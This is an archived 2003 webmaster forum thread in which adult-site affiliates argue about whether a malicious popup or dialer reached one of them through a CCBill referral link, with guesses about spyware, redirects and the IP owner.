kmanrox aka K-Man Industry Role: Join Date: Oct 2001 Location: The Gutter Posts: 29,292	ebus, you should participate in manual penile massagin much much more often. __________________ Crypto HODLr Crypto mining Angel investor

04-16-2003, 12:34 PM	#24
Corina Curves Registered User Join Date: Apr 2003 Posts: 45	Hello. I may be the one in question. But I can assure you it is not my fault. If you like I even posted a message earlier before this post on Amateurmasters. I am not sure what is going on here and have talked to also Sean moments ago. First off all the webmaster who signed u0p for my program has e-mailed me and I have answered back every e-mail trying to figure out wtf was going on. I do not understand what has happened and have explained that to him and asked him questions. When I spoke to Sean he assured me that that the problem was fxed. Well that is fine and dandy but why and how did this happen?? I did not tweak any thing in my program since I placed it up about a year ago. So some one hackled it or id on't know. Oh and also he added a screen cap of the site that loaded. That wasn't even my site that loaded. Here is thecapture that was sent me. This is not mine!! http://www.corinacurves.com/ccbill.jpg So ccbill needs to come up with an answer to this because I will not allow them to make it look like this was me. I am a good webmaster and would never screw anyone over. I have been with ccbill for a long time and they have always attended promptly to any problems I have had. And I have been 95% happy with them so I am not trying to slam ccbill but there needs to be some thing done!!

04-16-2003, 02:18 PM	#26
Corina Curves Registered User Join Date: Apr 2003 Posts: 45	Yes I got your e-mail and I sent you one back. I am very sorry that this has happened but I am still a bit clueless as to where and how you got that code. Bret at ccbill brought to my attention that I had a bad link in my referral program. When you cick on it Homegrwon Video pops up, because they host my site and that is like a 404 page I think you would call it. It pops up when there is a dead link. Homegrwon is very reputable and would never put some thing like that in there pops. Homegrwon is also trying to help figure this out too. As for the code where did you get that code?? When your ccbill admin and click on get code. It usually gives you a one line code to link to me. And that is your affilliate code so that your hits can be tracked and your sales will go to you. So that is why I am confused when you say you go to the admin and you click on html why it would give you that code you posted?? Or are you viewing source on one of the pop ups and the code is there?? Is that wherte your getting that funky code from. We do need to figure out exactly where your getting it and what is happening so we can prevent this from taking place!! Sincerely Corina

04-16-2003, 02:54 PM	#27
DannyWRP Registered User Join Date: Apr 2003 Location: On my sailboat Posts: 7	I just posted this in response to Corina on the AmateurMasters Board: "Corina, Now that I see what is happening to the guy, it's not something either you or CCBill did, he already had the MoneyTree parasite in his system and browser! It can take over at random times, and it looked like it did when he was on the CCbill affiliate page. What one of the varients does is randomly pop-up promos and ads for sites within the Moneytree system while someone is surfing. he blames it on the site he's on, without realizing that it's something already on his PC. Tell him to scan his system with Ad-aware or similar program. he can also visit http://www.doxdesk.com/parasite which will find it for him and give him the fix. Danny"

04-16-2003, 03:09 PM	#28
rowan Too lazy to set a custom title Join Date: Mar 2002 Location: Australia Posts: 17,393	I'm a moneytree affiliate. What's this about a parasite?

04-16-2003, 03:22 PM	#29
Kimmykim bitchslapping zebras!!!!! Industry Role: Join Date: Jun 2001 Location: In a shack by the beach Posts: 16,015	IF Moneytree were popping up something that could possibly compromise the integrity of things like user names and passwords for logins to sites, I would think that there are many people who'd be interested in taking action against them. The potential liability issues for the sites in question, and defending themselves against a liability suit that they had nothing to do with boggle my mind. I wouldn't be surprised to see some c&d's go out IF this is indeed the case.

04-16-2003, 03:50 PM	#31
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	No I DONT have that paresite !!!!!! Get you fackts straight asshole, and stop telling me whats on my system. Dont you think I would know if anything was on my mashine? Everytime something get added to my registrationn database, I get a popup - and I use spybot and adavare every day to ceep my PC clean. I posted the sourcecode THAT shoud had told you that you are WRONG Last edited by Machete_; 04-16-2003 at 03:57 PM..

04-16-2003, 05:03 PM	#34
DannyWRP Registered User Join Date: Apr 2003 Location: On my sailboat Posts: 7	Did some digging. The IP addresses in question (204.177.92.0-204.177.93.255) are run by a company called Lexitrans Tracked down some intersting stuff on some techie message boards about these guys. It seems they take existing dialer programs, and modify them with all sorts of stuff. If you see it installed on your PC, you just assume it's from mtree.com or goin.com, or any other site that runs dialers. If you already have any of the dialer programs in your PC, this exploits them and installs itself over them without you even knowing. They can then do all sorts of nasty stuff. BTW, on March 18th, Lexitrans was indicted for money laundering : http://stacks.msnbc.com/news/887174.asp You see ebus, a litle research and digging goes a long way. You should do that before you blame CCBill or Corina on a public board for what is most probably embedded in your system.

04-16-2003, 08:41 PM	#36
Corina Curves Registered User Join Date: Apr 2003 Posts: 45	I think Danny was only trying to be friendly and come up with a reason on why this happened. I am not sure why Kimmy and Ebus feel the need to respond so unfriendly back. Guess I don't get it. I like to conduct business in more of a friendly manner not cussing at each other and being rude. This will be my last message here. Ebus you know where to contact me and you know I will e-mail ya back. But I don't feel the need to participate in this discussion here. I am also willing to keep this case open till we get some sort of concrete answers that way we can learn to prevent, watch for, or maybe stop this from happening again. Sincerely Corina

04-17-2003, 02:51 PM	#37
lordnorm Registered User Join Date: Apr 2003 Posts: 1	After Corina approached me regarding this I did a little research myself and think I have found roughly the same things that Danny had as well. This 204.177.92.193 ip in which you recieved the harmful code from is just one of several connections this person had around the world. It is indeed run by Lexitrans from KS, though I think the perp acted apart from the company owning this ip. I found a host of worms,spyware,addware at this ip addy. Here is what I believe may have happened Ebus. Upon going to corina's webmaster page on ccbills side, there was a frame that pointed to a place on her site that did not exist. This triggered a redirect that sent you initially to homegrownvideo's front page. This is not malitious, we do this to steer traffic that is not going anywhere (404/401's) as many webmasters do on their servers. At this point you must have endured some exit traffic pop up's and then this hacker scrub made his move. He(bad guy) likely had a dialer spot that looked legit on the surface until he swapped out his page for a redirect that went to another redirect and so on. Eventually it led you to his unclean page that you posted originally. Whatever the case is Ebus, this fellow is long gone. Once word came out of this he must have removed all redirects and flitted back into the shadows whence he came. CCbill resolved the missing page frame fairly quickly by my estimate. I can certainly appreciate the anger you felt upon being hit by this hacker. I hate these assholes to the core. Just know that we can be a source of help, but it becomes challanging when we are the source of your rancor. I hope this helps you out some. -N